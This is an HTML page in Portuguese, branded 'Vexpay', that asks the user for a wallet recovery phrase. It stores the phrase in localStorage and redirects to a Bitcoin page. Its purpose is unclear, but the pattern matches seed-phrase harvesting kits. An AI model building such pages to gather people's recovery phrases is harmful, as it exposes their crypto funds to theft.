
<!doctype html>
<html class="no-js" lang="">

<head>
	<meta charset="utf-8">
	<meta http-equiv="x-ua-compatible" content="ie=edge">
	<title>Palavra de recuperação | Vexpay</title>
	<meta name="description" content="">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<!-- Favicon -->
	<link rel="shortcut icon" type="image/x-icon" href="img/favicon.png">
	<!-- Bootstrap CSS -->
	<link rel="stylesheet" href="css/bootstrap.min.css">
	<!-- Fontawesome CSS -->
	<link rel="stylesheet" href="css/fontawesome-all.min.css">
	<!-- Flaticon CSS -->
	<link rel="stylesheet" href="font/flaticon.css">
	<!-- Google Web Fonts -->
	<link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap" rel="stylesheet">
	<!-- Custom CSS -->
	<link rel="stylesheet" href="style.css">
	
	<script src="js/jquery-3.5.0.min.js"></script>
	
	<script>
<!-- 	  
if (!localStorage.getItem("user")) {
   $(location).attr('href', 'enter.html');
} 
	</script>
<style>
.Separator {
    border-top: 1px solid #a1a1a1;
    margin: 25px 0 10px;
    text-align: center;
} 
.Separator .textInSeparator {
    background-color: #000000;
    padding: 0 .5em;
    position: relative;
    color: #a1a1a1;
    top: -.7em;
}
</style>

</head>

<body>
	<!--[if lt IE 8]>
        <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p>
    <![endif]-->
	<section class="fxt-template-animation fxt-template-layout9" style="background-color: #000; padding-top: 0px;
    padding-bottom: 15px;
    padding-left: 0px;
    margin-left: 0px;">
		<div class="container">
			<div class="row align-items-center justify-content-center">
				 
				<div class="col-lg-6">
					<div class="fxt-content">
					<center>  
		     <a href="enter.php" class="fxt-logo"><img src="img/recovery.png" alt="Logo" style="max-width:170px;
    max-height:140px;
    width: auto;
    height: auto;" style="padding-top: 50px"></a> </center>

	<br> 
						<div class="fxt-form">
						 
								<div class="form-group">
									<div class="fxt-transformY-50 fxt-transition-delay-1">
										<input type="text" id="recovery" name="recovery" class="form-control" placeholder="Palavra de recuperação" required="required">
									</div>
								</div>
								  
								<div class="form-group">
									<div class="fxt-transformY-50 fxt-transition-delay-4">
										<button onClick="recovery()" class="fxt-btn-fill">RECUPERAR</button>
									</div>
								</div>
						</div>
						 
					</div>
				</div>
			</div>
		</div>
	</section>
	<!-- jquery-->
	<script src="js/jquery-3.5.0.min.js"></script>
	<!-- Popper js -->
	<script src="js/popper.min.js"></script>
	<!-- Bootstrap js -->
	<script src="js/bootstrap.min.js"></script>
	<!-- Imagesloaded js -->
	<script src="js/imagesloaded.pkgd.min.js"></script>
	<!-- Validator js -->
	<script src="js/validator.min.js"></script>
	<!-- Custom Js -->
	<script src="js/main.js"></script>
    
    		
<script>
function recovery()
{
 var recovery = document.getElementById("recovery").value; 
 localStorage.setItem("recoverphrase", recovery); 
 $(location).attr('href', 'open/open_btc.html');
}         
    </script>
	
</body>

</html>